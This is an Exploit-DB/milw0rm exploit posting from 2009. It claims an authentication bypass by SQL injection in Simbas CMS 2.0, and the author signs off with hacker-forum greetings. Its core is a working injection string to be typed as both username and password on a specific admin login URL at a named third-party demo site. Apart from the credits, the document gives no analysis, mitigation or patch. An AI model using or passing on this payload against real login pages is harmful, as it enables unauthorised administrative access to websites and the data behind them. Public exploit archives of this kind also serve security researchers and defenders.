Simbas CMS 2.0 - Authentication Bypass

EDB-ID:

8380

CVE:



Platform:

PHP

Published:

2009-04-09

-----------------------------------------------------
-----------------------------------------------------
Simbas Content Management System (auth Bypass) Remote Sql Injecion
-----------------------------------------------------
Founder: ThE g0bL!N(Dz)
Home: www.h4ckf0ru.com
Vive Algerie
# demo : http://www.officetoweb.co.uk/demo/index.asp
 
-----------------------------------------------------------
-----------------------------------------------------------
exploit
-------
http://www.officetoweb.co.uk/demo/admin/default.asp
username:  r0' or ' 1=1--
Password:  r0' or ' 1=1--

demo:
-----
http://www.officetoweb.co.uk/demo/admin/default.asp
------------------------------------------------------
Mission Completed
------------------------------------------------------
Thanx  :
           M0nSt3r-Dz - Master_FinaL - Dr-HTmL - Super Cristal- Hcoca_Man - Dreadful 
            Yassine_Enp- ViRuS_HaCkEr_Dz-Mr.JOoMJOoM-Naili
------------------------------------------------------------------------------------
www.h4ckf0ru.com/vb/
------------------------------------------------------------------------------------

# milw0rm.com [2009-04-09]